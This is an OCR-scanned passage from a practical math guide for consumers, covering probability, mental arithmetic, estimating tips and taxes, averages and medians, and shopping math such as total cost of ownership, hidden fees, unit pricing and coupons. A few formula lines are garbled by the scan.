The chances are 1 in 190 of your pulling out 2 red socks in a row. 


Here’s one last example, and it’s a classic: What’s the probability 
that a coin will come up heads or tails? 


First, you know that, if you flip a coin, it will come up on one side 
or the other. So you figure the probability of the coin coming up 
heads (or tails) by using this formula: 

p=} 
What happens if the coin comes up heads 1,000 times in a row? 
Does that mean you’re due to see tails, or is the trend toward more 
heads? In this case, the probability of the coin coming up heads is 


p=} 


The probability is exactly the same every time. Independent events 
don’t “influence” each other. 
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What are the odds? 


Odds are the ratio of a favorable outcome to an unfavorable 
outcome. Odds are essentially the same as probability but 
expressed differently. In rolling a die, the probability of rolling 
a1 is 1 chance in 6, or 1/6. There’s 1 favorable outcome and 

5 unfavorable outcomes. You would express the odds in this 
scenario as 5:1, and you’d say it as “5 to 1 against.” To find out 
more about odds, head to Chapter 9. 


Chapter 4 


The Miracle of Mental Math 


In This Chapter 
Adding, subtracting, multiplying, and dividing large numbers 
Making reasonable estimates 
Looking at common statistics — averages and median values 


J handiest calculator is between your ears. Your brain is fast 
at doing math and doesn’t have any batteries to recharge. In 
day-to-day activities, mainly shopping, mental mathematics (being 
able to solve math problems without paper, a pencil, a calculator, 
or a computer) is very convenient. 


In this Chapter, I give you pointers on how to improve your mental 
math capabilities and offer scenarios featuring common math prob- 
lems that you can solve just by working things out in your head. 

I also cover estimating, a trick anyone who’s ever been shopping 
has used at one time or another, and simple statistics, just because 
they're interesting and fun. 


Mental Math Basies 


The secret to success with mental math is to tackle simple problems 
that have good prospects for success. Although in time you could 
learn to solve very complex problems, doing so is more of a parlor 
trick than a useful skill. 


Follow this general approach to mental math: 


Memorize some numbers. Which numbers? These: 


e Your multiplication table. That’s not difficult, because 
you probably learned the table in the third grade. 


e Common equivalencies. The number of minutes in 
an hour or feet in a mile (or, alternatively, meters ina 
kilometer) is useful, too. 
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Know some arithmetic basics. Get familiar with the common 
operations (additions, subtraction, multiplication, and division). 
Often, a complex looking problem becomes a simple problem 
if you know how to break things down. For example, many 
“complex” multiplication problems are simple to solve if you 
can break them down into “multiply and then subtract” 
problems. The same is true of breaking up complex-looking 
addition problems. 


Know when to stop. Find your personal limit (in interest and 
skill) to doing certain operations. For example, I can multiply 
a four-digit number by a two-digit number in my head, but 
that’s it. For anything bigger, I’m going to the calculator. 


Adding and Subtracting on the Fly 


Quick addition and subtraction have one simple rule: Break the 
problem into parts. As you see in the following section, you can 
usually represent each number in an addition or subtraction 
problem as two smaller numbers that are easier to work with. 


One key to making this technique work is to think about problems 
a bit differently than you did in school. For example, you learned 
to add and subtract from the right, starting with the ones column. 
In mental math, you get faster results by working from the left, 
starting with the leftmost column. 


Adding numbers quickly 


To quickly add two numbers, even long ones, start at the left, at a 
column that seems comfortable to you. Break out the “easy” part 
and the “hard” part. 


For example, say you want to add 2,344 and 698. Break the hundreds 
out from the tens and ones. The equation looks like this: 


total = 2,344+ 698 
total = (2,300 + 44) + (600+ 98) 


Adding 2,300 and 600 is fairly easy; in fact it’s just like adding 23 
and 6. The answer is 2,900. 


Now, handle those other pesky items, the 44 and 98. A good 
technique is to make 98 into 100 by reducing the 44 by two. The 
equation looks like this: 

total = 44+ 98 

total = 42 +100 
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This little piece of “surgery” gives you a nice round 100 and a very 
manageable 42. Add the 100 to 2,900, giving 3,000. Now tack on the 
42. The answer is 3042. 


For a faster solution, you could just take 2 from the 44 and turn 
698 into 700. The object is always to make “easy” numbers out of 
“hard” numbers. 


Subtracting numbers quickly 


To subtract two numbers, you use the same technique you use to 
add: You start at the left, at a column that seems comfortable to 
you, and break out the “easy” part and the “hard” part. 


For example, say you want to subtract 530 and from 2,908. Break 
the hundreds from the tens and ones and then do the math on the 
resulting easier problems. The equation looks like this: 


difference = 2,908 — 530 
difference = (2,900 + 8)—(500+30) 


difference = (2,900 -500 )+ (8-30) 
difference = 2,400 + 8- 30 


At first, you’re off to an easy start. Take 500 from 2,900 and you’re 
left with 2,400. 


That leaves taking 30 from 8. Oops! Oh, my! What should you do? 
Answer: “Grab back” 100 from your partial result of 2,400 (leaving 
it at 2,300) and “give it” to the 8. Now you have 108 — 30. Subtract 
30 from 108, and you’re left with 78. 


Adding 2,300 and 78 is no problem. The answer is 2,378. 


Making Hay of Multiplication 
and Division 


Like addition and subtraction, multiplication and division are easy 
to do in your head when you alter the numbers slightly to get a 
speedy result. Apply your knowledge of the multiplication table 
whenever possible. 
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Multiplying in your head 


Multiplication is easy when the numbers are nice and round, but 

it can quickly get overwhelming when they aren’t. For example, 

if four items are $5.00 each, you can pretty easily determine the 
total, because you know that 4 x 5 = 20. Ten items at $5.00 each will 
be $50.00. 


But what if the numbers aren’t nice and round? The secret is to 
round up to a number that’s easy. Then subtract the small difference 
between the rounded number and the actual starting number, 
perform the multiplication on this small difference amount, and 
then do a little subtraction. (Trust me: It sounds more complicated 
that it is!) 


Suppose, for example, that four items are $4.97 each and you want 
to find the total. 


This problem, if you’re using traditional multiplication, would 
require a calculator for many of us: 


4x $4.97 = $19.88 


But you can do it mentally by first rounding up from $4.97 to $5.00 
and multiplying. The result is $20.00 (4 x $5.00). Then you take the 
difference between the two numbers ($0.03) and multiply, giving 
you $0.12 (4 x $0.03). Last, you subtract the multiplied difference 
from the multiplied rounded amount. 


First, multiply the “big” rounded amount. 
4x $5.00 = $20.00 


Notice that you left off $0.03 per item? That’s okay. Multiply the 
“small” difference amount separately. 


4x $0.03 = $0.12 


Now, simply take the $20.00 and subtract the $0.12. The answer is 
$19.88. 


You deserve a break today! Here are some easy, handy, and fast 
multiplication techniques. 


Multiplying by 10 requires only that you append a zero to the 
end and move the decimal one place to the right. For example, 
if you multiply $5.00 by 10, you get $50.00. 
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Multiplying by 5 is almost as easy as multiplying by 10. Just 
multiply the quantity by 10 (append a zero and move the 
decimal point to the right) and then divide the result by 2. 
To determine what $15 x 5 is, for example, multiply $15 by 10 
($15.00 x 10 = $150.00) and divide by 2 ($150.00 = 2 = $75.00). 
The answer is $75. 


Dividing in your head 


Dividing in your head appears to be a little more complicated than 
multiplying, but appearances can be deceiving. Dividing is simple. 
The general idea is to divide the “big” division problem into 
smaller “little” division problems. 


Say you want to divide 128 by 4. Fortunately, dividing by 4 is quite 
easy. 


result = 128 
-120,8 
result = a + A 


result = 30+2 
result = 32 


How do you get the answer? Find the first part of 128 that can be 
divided by 4. That’s 12, the first two digits of the number 128. Then 
divide. The answer is 3. 


Next, look at the rest of 128, which is 8. It easily divides by 4, giving 
you 2. 


You may be asking yourself, “What if the numbers aren’t all nice 
and round?” Not to worry. The principle is the same. For example, 
if you need to divide 131 by 4, just expand your equation a tad. 


result = 431 
~120,8,3 
result = A +4tG 


result = 30+2+3 


result = 323 


Divide everything that comes out “even.” What’s left is a proper 
fraction. Then do another division to get a decimal fraction. In the 
example, 3/4 = 0.75, so the result of the division is 32.75. When you 
apply this principle to money, the result is $32.75. 
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The fastest, easiest division is when you’re dividing by 10 or 5: 


Dividing by 10 just requires moving a decimal point one place 
to the left. In that way, 27.5 (for example) becomes 2.75. If the 
number doesn’t show a decimal point (7 for example), it really 
is there but not notated. Think of 7 as 7.0 — now you seea 
decimal point. When you move it one place to the left, the 
answer is 0.7. 


To divide by 5, first divide by 10 and then double the result. 
To divide 27.5 by 5, for example, first divide it by 10 (27.5 + 
10 = 2.75) and then double the result (2.75 x 2 = 5.50). 


All looks confusing at first, but practice really helps. 


Estimating with Ease 


Estimating is the process of finding an approximate amount. The 
amount might be weight, volume, distance, time, or money. The 
result may not be perfect, but not it’s expected to be. An estimation, 
although not precise, is good enough to get the job done. 


When you take your car to the mechanic, you'll typically get an 
estimate of charges — the approximate (not the exact) sum of 

the costs of parts and labor. You also get an estimate of charges 
when you ask a crafts person to do painting, drywall work, or a 
fence installation. When you estimate, you’re in good company. 
Corporations, economists, and governments make estimates all the 
time. 


Apply the following simple techniques in estimating: 


1#” When possible, compare something known to what is 
unknown. Known items could be parts of your body (for 
linear measurement), size of a bottle (for liquids), size of a 
box (for solid products), and so forth. 


Use your body as a quick length estimator. The distance 
across the palm is about 4 inches (about 10 centimeters). 
The distance from the nose to the tip of the finger with the 
arm outstretched is about 36 inches (90+ centimeters). 


¥ Use a trick. For example, in the United States, convenience 
stores have height scales painted on the door frames. It’s 
considered a method of estimating the height of a fleeing 
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armed robber, but it works equally well in giving you a quick 
estimate of your teenager’s height. 


Round up. While you’re shopping for groceries, round the 
prices up to the next 10 cents or dollar. As you add up your 
purchases, you'll get a good idea of what your bill will be. 
On a quick trip to the grocery store, you might think, “Let’s 
see. A head of lettuce is about $1.40 and a soft drink is about 
$1.25. That’s $2.65. I have $3.00 in my pocket. I can buy these 
things.” 


If all else fails, make a guess. If your guess is based on any 
kind of reasoning, you may come close. 


Do not perspire over minor details. “Don’t sweat the small 
stuff.” An estimate is an approximation. 


In the following sections, I cover some scenarios when estimating 
comes is really handy. 


The rule of thumb for estimating is a practical one: If you can 
measure and calculate, then measure and calculate. If you 
can’t measure and calculate, then estimate. 


Estimating sales tax and 
value added tax (VAT) 


Many states in the U. S. charge sales tax, and those states may 
have local variants that increase the tax. A safe estimate is to allow 
10 percent of an item’s purchase price for sales tax. 


For example, if you buy a $70.00 item at the hardware store, you 
can determine what 10 percent of that amount would be by moving 
the decimal one place to the left (see the earlier section “Dividing 
in your head”). The tax will be approximately $7.00. 


Elsewhere around the world, people pay a value added tax (VAT), 
which hovers around 20 percent, being higher in some countries 
and lower in others. 


To estimate VAT, follow the same approach you use to estimate 
sales tax. Determine 10 percent by moving the decimal one place 
to the left in an item’s price and then double the result; that 
gives you 20 percent. If an item costs €70.00, the VAT will be 
approximately €14.00. 
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Estimating tips 


Diners in the United States typically tip about 15 percent of the 
sum on the check. Calculating a 15 percent tip is quick and easy, 
using the strategies I discuss earlier in this chapter. If, for example, 
the check is $34.57, drop the 57 cents to get $34. Determine what 
10 percent of $34 is by moving the decimal one place to the left 
($3.40). Divide that number by two to get the 5 percent ($1.70) and 
then add the two results ($3.40 and $1.70) together. Your 15 percent 
tip? About $5.00. 


Estimating guests at a banquet 


Do you want to estimate how many guests are attending a sit-down 
dinner at a wedding? Say you sit down at your table and count 

10 seats available. (Banquet tables are usually round tables called 
rounds, and the guests are seated at “round of 8” or “round of 10” 
tables.) Stand up for a moment. Count the tables in the room. If 
you see 20 tables, a little mental multiplication tells you that the 
banquet has been set up for 200 guests (20 “round of 10” tables). 
Chances are that most seats will be filled, so the wedding has 
about 200 guests. 


Doing Simple Cerebral Statistics 


Professional statisticians spend a lot of time working with complex 
mathematics. However, most people aren’t statisticians, yet they 
might still like to develop a statistic or two. The two handy stats 
you can do in your head are the average and the median. 


Figuring averages 


An average is the result of adding up numbers in a collection and 

then dividing that result by the number of items in the collection. 
The average is officially known as the arithmetic mean. Two averages 
are fairly easy to calculate using mental math — bowling average 

and grade point average. 


Bowling average 


Your bowling average is the total number of points you’ve bowled 
in a few games, divided by the number of games you’ve bowled. 


Imagine that you bowl once a week in a league that meets 12 times. 
If you know your multiplication table up to the 12s and if your 
league bowls the typical three games in one night, you can see 
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that you bowl a total of 36 games (12 x 3 = 36). To get your average 
score for all those games, you add up all your scores and divide 
the total by 36. 


Frankly, that’s a lot of adding, and life is short. Why not just average 
your scores for the number of games you bowled in one night? 
(Besides, in many leagues, handicaps are calculated based on the 
average of the first night’s bowling.) 


Say, for example, that you bowl 150, 175, and 133 on the first night 
of the league. To find your average without lifting a pencil, do the 
following: 


1. Add the scores. 


Break the numbers into more easily added combos, an 
addition trick I share in the earlier section “Adding numbers 
quickly.” Here, for example, you “take” 25 from 175 and add 
it to 133, giving you 158. That reduces 175 to 150. Add 150 
and 150 to get 300, and then just add 300 to 158 to get 458. 


total = 150+175+133 

total = 150 +(175—25)+(133+ 25) 
total = 150+(150)+(158) 

total = 300+ 158 

total = 458 


The total score is 458 points. 


2. Divide 458 by the number of games, which, in this 
example, is 3 games. 


You notice that 450 is a nice round number, so you decide 
to break the fraction into two fractions, which lets you 
divide 450 by 3 and then separately divide 8 by 3. 


Dividing 450 by 3 is easy. That division results in 150. The 
clumsy part is dividing 8 by 3, because the answer is “2 and 
something.” Drop the “and something.” Bowling averages 
are typically rounded down. 


average = BS 
average = 40 + 8 


average = 150+ 22 


average = 152 


Your average for the night is 152 points. 
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Grade point average 


Many countries determine an average score for grades, but the 
systems vary. In the U. S., the grade point average (GPA) is a 
regular issue for students. Each letter grade (A, B, C, and D) is 
assigned a numerical equivalent (4, 3, 2, and 1, respectively). 


To calculate a GPA in your head, do the following: 


1. Convert the grades to numbers. 


Say you’re taking 4 courses and your grades are A, A, C, 
and D. The numeric equivalents are 4, 4, 2, and 1, 
respectively. 


2. Add the numbers up. 


This task is easy because most people don’t take a lot of 
courses in one semester or quarter. The result is 11. 


3. Now divide by the number of courses — 4 in this 
example. 


When you divide 11 by 4, you get a number that is greater 
than 2 and less than 3. Actually, it’s 2 with a remainder of 3. 
Divide 2 by 3 to get 0.75. Your GPA is 2.75, or about a C+. 


cpa=4+4e241 


Beware of the fallacy of averages (see the statistics section in 
Chapter 3). Most averages work best with a large number of items 
in a sample. Averages aren’t as reliable with a small sample. For 
example, you could say, “I have one child who’s four feet tall and 
one who’s six feet tall. Their average height is five feet.” That’s 
mathematically correct, but it’s meaningless. 


Managing medians 


The median is the value that separates the upper half of the items 
in a sample from the lower half. It’s not the same as the average. 


You can find the median by looking at the members of a group, 
arranging the values in order, and then counting down through 
the list until you reach the middle number. If the list has an even 
number of values, you take the average of the two central numbers. 
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Here’s an example. Say you want the median age for your kid’s 
Little League team, which has 11 players. You arrange the ages 
from least to greatest and count down to the middle, the 6th value 
in the list. That’s your median. If your child’s team has 12 payers, 
the median age would an average of the 6th and 7th values. 


Often, you need to interpret, not create, a median. Imagine a 
neighborhood has 11 households. In 10 households, the annual 
income is $10,000; the 11th household has 1 millionaire with an 
annual income of $1,000,000. The average income is $100,000, but 
that doesn’t mean that everyone’s rich. The median income is 
$10,000. 


You can do both of the calculations in your head by just looking 
at a list and counting the items. Simply count up from the lowest- 
value item to find the median. 
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Math for Everyday 
Activities 


The 5th Wave By Rich Tennant 


“We all Know it’s a pie, Helen. 
There’s no need to pipe the 
number 3.14 on the top.” 


In this part... 


n this part, you go on a tour, but unfortunately not to 
any exotic places. You apply real-life math to real-life 
places — your home and stores around town. 


With the math tips and tricks I share in these chapters, 


you'll be able to make smart choices at the grocery store 
and when shopping for other items. You'll be able to whip 
up things in the kitchen (even when you have to adjust a 
recipe), improve your nutrition and health, and take care 
of yard projects and home maintenance. The last chapter 
in this part takes you all over town and features a full 
workup of a modern problem: “Should I drive across town 
to save 10 cents per gallon on gasoline?” 


Chapter 5 


Let's Make a Deal! Math You 
Use When Shopping 


In This Chapter 
Figuring out the actual cost of the items you buy 
Evaluating how much coupons, discounts, and sales really save you 
Looking at the costs associated with different payment methods 


Becoming aware of the impacts your shopping choices have 


J practice of going to a marketplace is very old, so when you 
shop you're in the same company as citizens of ancient 
civilizations. In fact, historians think that Trajan’s Market in Rome 
is the world’s oldest shopping mall. You can bet that those shoppers 
wanted the same thing you do: to get what they wanted for the 
best price. Of course, shopping isn’t always about bargains; it’s 
about making satisfying choices, too. 


The math you use when shopping is the same whether you live 
lean or high on the hog. It helps you make your choices. Although 
much of the math in this chapter takes place in the grocery store, 
the principles apply to shopping in all places. (And if a shopping 
trip just isn’t a shopping trip unless you stop for lunch, too, flip to 
Chapter 9 for the math you use when dining out.) 


Determining Actual Cost 


Determining the cost of a purchase involves more than just looking 
at the price. The true cost is a combination of factors. Fortunately, 
the math is easy: Just figure out the various costs and add ’em up! 
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Finding the total cost of acquisition 


The total cost of acquisition (TCA) is defined as all the costs 
associated with buying something. The TCA encompasses more 
than just the price; it includes taxes, delivery charges, and 
installation. Also included are the transportation costs — the 
money you spend to go get the item or to have it delivered. 


Think of that washer/dryer set you’ve had your eye on. It’s on sale, 
which is great, but you won’t just pay the sale price. Taxes, delivery, 
installation, and the cost of new gas fittings (if you need them) will 
send the final, bottom-line price up. The common result? Sticker 
shock, where the total price you pay is a little (or a lot) higher than 
the advertised price. 


Chances are excellent that you are already figuring TCA for purchases. 
For little things, you can do the calculations in your head. For big 
items, such as a car, you want to use a pad and pencil, a calculator, 
and/or a spreadsheet application. Following are some common 
scenarios. 


Chasing a sale — Is it worth it? 


Suppose you can buy a TV locally for $200.00, but you see that 
another store 32 miles away has it on sale for $190.00. As it turns 
out, your car gets 16 miles per gallon, so the trip will take 4 gallons 
of gasoline. If gas is $4.00 per gallon, is going to the second store 
worth it? To determine that, you add up the cost of the TV and the 
cost of the gas you'll use to get there (see Figure 5-1). 


Item Store 1| Store 2 
Television $200.00) $190.00 
Gasoline (4 gallons) $0.00} $16.00 
Total cost of acquisition | $200.00 


Illustration by Wiley, Composition Services Graphics 


Figure 5-1: Calculating whether a sale price far away is a better deal than a 
non-sale price closer to home. 


As you can see, the answer is a big “No!” If you add in the cost of 
gasoline, you spend more money chasing the “bargain” than you 
save. 


Comparing taxed versus non-taxed items 

Some people avoid state sales tax by crossing a state line to shop 
in a state that doesn’t have the tax. Buying over the Internet has 
the same effect. In this example, Store 2, where the item costs less 
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but is 32 miles away, is in a no-sales-tax state. Add up the costs, 
and you can see that avoiding the sales tax means you save more 
by going to Store 2 (see Figure 5-2). 


Item Store 1| Store 2 
Television $200.00) $190.00 
Tax (8 percent) $16.00) $0.00 
Gasoline (4 gallons) $0.00} $16.00 


Total cost of acquisition 


Illustration by Wiley, Composition Services Graphics 


Figure 5-2: Determining the better deal when sales tax is figured in. 


$216.00 


$206.00 


Say that both stores charge the same sales tax rate (8 percent, for 
example). That means that the only factor affecting savings is the 


amount of gasoline you'll use. 


To improve the savings, you can “spread” the gasoline cost over 
several items. In the example shown in Figure 5-3, you determine 
that, as long as you’re going to get another television, you may 

as well buy a DVD player to go along with it, and (what the heck) 


how about buying that gas grill you like? If all these items are 
less expensive at Store 2, you can enjoy some serious savings 


by buying several items in one trip, since the same gasoline cost 
spreads over several purchases. 


Illustration by Wiley, Composition Services Graphics 


Figure 5-3: Spreading out the cost of gas over multiple items. 


Item Store 1| Store 2 
Television $200.00) $190.00 
Gas grill $300.00) $260.00 
DVD player $100.00} $85.00 
SUBTOTAL $600.00) $535.00 
Tax (8 percent) $48.00} $42.80 
Gasoline (4 gallons) $0.00} $16.00 
Total cost of acquisition | $648.00} $593.80 


This scenario isn’t rare. You see this sort of buying every day at 


big box stores (also known as superstores or megastores). 


Figuring the total cost of ownership 


The total cost of ownership (TCO) is the estimated sum of direct 
and indirect costs of buying something. Direct costs are pretty 


much what you pay for an item; indirect costs come up later. 
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Indirect costs tend to occur again and again and again. The example 
in Figure 5-4 shows the real annual TCO for an entry-level 
automobile. Notice how much the total cost changes when you 
figure in both the direct and indirect costs. 


Monthly Monthly Direct 


Item Direct Cost| and Indirect Costs 
Auto loan, $15,000.00 

48 month term/10 percent interest $380.44 $380.44 
Registration ($150.00 per year) $12.50 
Insurance $105.00 
Maintenance ($60.00 every other month) $30.00 
Gasoline $173.20 


Total cost of ownership $380.44 $701.14 
Illustration by Wiley, Composition Services Graphics 


Figure 5-4: Factoring in both direct and indirect costs. 


The math is easy: Just figure out the costs and add ’em up! The 
car payment isn’t that bad (only $380.44), but the TCO ($701.14) 
may Cause you some pain. (And this doesn’t even include 
depreciation — the concept that the selling price or trade-in price 
of a car goes down a little every day.) 


There are two valuable lessons here. First, with TCO analysis, you 
see the true cost of continued ownership, and second, such 
exercises get you thinking about costs you may have ignored. 


Calculating TCO is useful for what economists call durable goods 
(long-lasting items such as cars, furniture, appliances, and home 
electronics). You’d never try to calculate TCO for a vacation, 
because doing so just doesn’t make any sense. With a vacation, 
the money is spent; you have the memories and the photographs, 
but no long-term cost of ownership. Accountants call spent money 
sunk costs. The best cost analysis for a vacation consists of planning 
for every expense and comparing prices for major expenses such 
as airfare and hotels. Jump over to Chapter 9 to see how it’s done. 


Uncovering hidden costs 


Hidden costs are usually expenses not included in the purchase 
price of an item. Mostly, nobody’s trying to hide them; they are 
simply the costs of supplies, installation, maintenance, or minor 
recurring fees. However, there are other costs that merchants 
would prefer you didn’t know about. These are expenses that 
aren’t prominent in sales literature. The old saying that “the big 
type giveth and the small type taketh away” applies. Those costs 
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come to light later, often at a point where you feel it’s too late to 
back out of the deal. 


Places where hidden costs are common include the following: 


Cruises: Cruise lines advertise their rates as “all inclusive,” 
which is true as far as your stateroom, meals, and some 
activities go. But you pay extra for onshore excursions, 
massages, an Internet connection, and cocktails. 


Airfare: Until recently, the full price of an airline ticket in the 
United States wasn’t revealed until the purchasing process 
was almost complete. That is, the advertised price was lower 
than the real price. Various taxes and fees weren’t included, 
and some still aren’t. You can expect many other new, strange 
fees, too, including a fee if you want priority boarding and 
charges to check in luggage. Figure 5-5 shows how a $378.00 
fare is really a $420.80 fare. The excise tax is part of the 
advertised fare, but all the other fees are still separate. 


Bank charges: Banks in the United States have long invited 
controversy about fees for monthly service, overdrafts, and 
overdraft protection. The trend in legislation is to demand 
greater transparency. 


 Unbundling: Unbundling is separating the price of goods or 
services from a single charge into separate charges. Every 
buyer expects something to be “not included” with the 
purchase, but unbundling is a merchant’s deliberate attempt 
to show lower prices by separating (that is, not including) 
some fees from the basic cost of the product. For example, 
you can see unbundling when you buy smartphones, e-readers, 
and tablet computers. The basic “box” is nothing other than 
the device, and you have to buy screen protectors, cases, and 
so forth, separately. 


Cost and Payment Summary 


Base Fare $351.62 
+ Excise Taxes $26.38 


Advertised Fare $378.00 


+ Segment Fee $14.80 
+ Passenger Facility Fee $18.00 
+ Security Fee $10.00 


Total Payment: $420.80 
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Figure 5-5: Airfare fee summary: Notice the additional charges. 
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Hidden cost math is very simple. Locate the hidden costs, if you 
can, and add them up. 


total cost = advertised cost + hidden costs 


In the airline ticket example, this is the calculation of hidden costs: 
total cost = advertised cost + hidden costs 
total cost = (base fare + excise tax) + 
(segment fee + facility fee + security fee) 
total cost = ($351.62 + $26.38) + ($14.80 + $18.00 + $10.00) 
total cost = ($378.00) + ($42.80) 
total cost = $420.80 


Making Tradeoffs: A Fun 
Balancing Act 


Consumers in many countries have abundant choice in what mer- 
chandise they buy. Some common choices include 


1# A choice between a name brand product and the generic 
product (also called a store brand or private label product). 


1# A choice between organic and non-organic products or locally 
grown produce and produce from another country. 


A choice between a product made in your own country and 
one made on foreign shores. 


When faced with many choices, consider the tradeoffs. A tradeoff is 
a buying scenario where you decide to give up one thing in order 
to get another. Typical tradeoffs might be 


Price versus name brand: When you’re buying food, you may 
opt for a generic product because you think the name brand 
costs too much. Conversely, you may go for a more expensive, 
name-brand television because you have confidence in that 
manufacturer’s products. 


/ Quality versus price: You may decide to buy the more 
expensive suit with a well-known designer label because 
you're confident it’s well made and will last a long time. 


Other factors versus price: You think, “The product made in 
my country costs more, but I feel patriotic by supporting it. 
Pll buy it instead of the foreign product.” Or you think, “The 
organic produce costs more, but I think it’s healthier, and it’s 
locally grown. I'll buy it, despite its higher price.” 
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Price is almost always a factor in making tradeoffs because it’s 
easy to quantify the money. If price is the only factor in a tradeoff, 
the lower price almost always wins. The subjective factors ina 
tradeoff — like the value you place on organically grown food or 
your feelings about buying products made in your own country — 
are important, too, even though they’re very difficult to quantify. 


aX) Don’t be afraid to quantify subjective factors. One way to do it is 
to assign a number from -10 to +10 for each consideration, with -1 
through -10 representing the downside of making the purchase, 
and +1 through +10 representing the upside. For example, say it’s 
your 20th wedding anniversary, and you’re thinking of getting your 
ever-lovin’ honey a nice gift. Figure 5-6 shows what your reasoning 
might look like, with numeric ratings. In this instance, when you 
add up the ratings, the gift gets a +2. Buy it. 


Item Rating 
This gift will cost $200.00 -3 
But it's our 20th anniversary 6 


But | only make $200.00 per week 
But my spouse will be impressed 
And | can charge it 

But | have to pay off the charge 
What the heck, you don't live forever 
Tradeoff value 
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Figure 5-6: Assigning numeric values to the intangibles. 


Where to buy is another, but different, kind of tradeoff. See the 
section “Determining Where to Shop.” 


Buying in Quantity: A Good Deal? 


Buying in quantity allows you to take advantage of quantity pricing. 
With quantity pricing, a merchant offers a lower price if you buy 
more of a product. Many people love such pricing and like to call it 
a discount (which it isn’t). 


Buying a quantity of a product costs more, but the unit price is 
lower. To figure the unit price, you divide the total price by the 
number of units: 


total price 


unit price = ———~——_ 
P number of units 


SO Part il: Math for Everyday Activities 


ar 


Compare two extremes of unit pricing. A single bottle of water at a 
convenience store might sell for $1.00, making its unit price $1.00: 


unit price = $1.00 


unit price = $1.00 


By contrast, you can buy a case of bottled water at a giant 
warehouse store for $4.45. If the case contains 35 bottles of water, 
its unit price is about $0.13 per bottle — quite a price difference 
compared to the convenience store bottle! 


$4.45 
35 
unit price = $0.127 


unit price = 


To calculate unit prices, use a calculator. Over time, you may find 
that you can make good approximations simply by doing the math 
in your head. 


Quantity pricing is super when you use a lot of an item, such as 
bottled water or paper towels. Common sense says that it’s not 
a good idea to buy big quantities of items you using sparingly (or 
rarely). 


Knowing the Real 
Cost of Sale Items 


A sale is a temporary reduction in the price of an item. Many 
merchants, big or small, local or national, have sales. Sales are 
popular because the idea of getting an item at a lower price than 
previously advertised appeals to many people. 


Sales may be seasonal (think post-Christmas), or pseudo-seasonal. 
A pseudo-seasonal sale is a “manufactured” sale, often citing a 
holiday. For example, think “Big Fourth of July Blowout!” No real 
reason exists for a sale on the Fourth of July. A closeout sale or 
clearance sale is intended to reduce the inventory of an item to 
zero. 


In your quest for a deal, be aware that not all sales — or bargains 
or discounts or coupons — are created equal. In the following 
sections, I tell you how to decipher which deals are worth pursuing. 
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Bargain buying rules and cautions 


Judging a good deal is entirely subjective. For example, | have a friend who 
bought a used Rolls-Royce, and he felt that he got a very good deal. | don't need a 
Rolls-Royce, so the deal wouldn't appear to me to be a bargain. 


So before you plop down your hard-earned cash, ask yourself these simple 
questions when you find a “bargain.” Doing so will help you avoid making an 
irrational — and sometimes costly — decision: 


1# Dol need the item? If you need the item, it doesn’t matter if it's on sale, but so 
much the better if it is. If you were hesitating about buying this item, maybe a 
bargain price will get you to act. 


4 İs it “too good to pass up?” Really? If you don’t need the item, the benefit 
doesn't exceed the cost. Don’t buy. 


Can | afford the item? Not being able to pay for an item pretty much reduces 
the joy of owning it. 


Be prepared for “bargain hunter's remorse.” Later, you may realize that you could 
have done without the item entirely, or you may find that you could have bought it 
for less somewhere else. 


Counting coupons 


Some sales apply to everyone. Other sales are based on a coupon 
and apply only to people who present the coupon to get a 
reduction in price. (Interesting tidbit: The word coupon comes 
from the French couper, meaning “to cut,” and you generally cut 
coupons out of the newspaper.) 


Do coupons really save you money, and if so, how much? The 
following sections help you find out. 


Single item coupons 


The most common coupon is for a fixed amount off a particular 
item. Think “10 cents off on a 15 ounce can of Aunt’s Tillie’s Baked 
Beans,” for example. 


What does $0.10 off really mean? It’s an absolute reduction of 

$0.10. It doesn’t amount to a hill of beans whether Aunt Tillie’s 
Baked Beans normally sells for $1.49 or $1.99; the coupon still 

reduces the price by 10 cents. 
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S Grocery coupons almost always apply to brand name items. 


Compare the sale price of the brand name item to the price of its 
generic equivalent to see where the bigger savings are. 


All-item coupons 


You may receive a coupon that applies to all or almost all items in 
a store. Figure 5-7 shows such a coupon. 


Unfortunately, the coupon requires a $75.00 minimum purchase. 
You have to spend $75.00 to save $10.00. If you don’t need $75.00 
worth of merchandise, the coupon isn’t useful. 


o ffi ceCity Exes 6/23/12. k 


$10 OFF 


your in-store purchase 
of $75 or more, 
excluding all computers. 
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Figure 5-7: An all-item coupon. 


Calculating percentage decreases: 
Vou save 10 percent! 


Sometimes you see an advertised discount, such as “Take 10 percent 
off any item in the store.” If the deal applies to everything in the 
store, that’s good. If it applies to the total cost of multiple items, 
that’s better yet! 


A 10 percent discount is easy to calculate. In fact, you can do it in 
your head. Just take the item’s price and move the decimal point 
one place to the left. A 10 percent discount on a $70.00 item is 
$7.00. Alternatively, you can perform this calculation: 


discount = regular price x 0.10 
discount = $70.00 x 0.10 
discount = $7.00 
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Figuring the discounted amount is easy, too. Just subtract the 
discount from the regular price. 


discounted price = regular price — discount 
discounted price = $70.00 — $7.00 
discounted price = $63.00 


Calculating the real percentages 
in “get one free” offers 


“Get one free” offers come up from time to time. The most common 
is “Buy one, get one free,” but occasionally you see other versions 
(like around July 4th, when fireworks retailers offer “Buy five, get 
one free” deals). Calculating the average price is as simple as 
dividing the price for one item by the number of items. In the “buy 
one, get one free” scenario, you divide by 2 items. 


regular price + price of free item 
number of items 


$7.00 + $0.00 
2 


average price of item= 


average price of item= 


$7.00 
2 


average price of item= $3.50 


average price of item= 


The average price is $3.50 per item. When a $7.00 item sells for 
$3.50, that’s a 50 percent discount. 


“Buy two, get one free” offers are also common. The math is similar. 


regular price + regular price + 


price of free item 
number of items 
$7.00 + $7.00 + $0.00 
3 


average price of item= 


average price of item= 


$14.00 
3 


average price of item= $4.67 


average price of item= 


The average price is $4.67 per item. When a $7.00 item sells for 
$4.67, it’s selling for 67 percent of its regular price. That’s a 
33 percent discount. 


S4 Parti: Math for Everyday Activities 


A typical variation is what I call the “Buy 1 and Don’t Get Another 
One Free.” These coupons will offer a second item but not for free. 
Usually a small cost is associated with it, as well as a requirement to 
buy some other item. The coupon in Figure 5-8 gives you a second 
sandwich for $1.00, as long as you buy the first sandwich and a 
beverage. 


Hoagie Haven 


$1 TURKEY & BACON 
AVOCADO 6” HOAGIE! 


When you buy a 6” Turkey & Bacon 
Avocado hoagie and a drink. 


Offer only valid at participating Hoagie Haven locations. This 
coupon cannot be used in conjunction with any other offers 
Cannot be redeemed for cash, Additional charges may apply. 
Not for sale. All rights reserved. 


Expires 8/17/12 
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Figure 5-8: A variation of the typical “buy one, get one free” deal. 


Dealing with dining specials 


Restaurants have a coupon variation that you’ve probably seen. 
“Buy one entrée at full price and get a second entrée (of equal or 
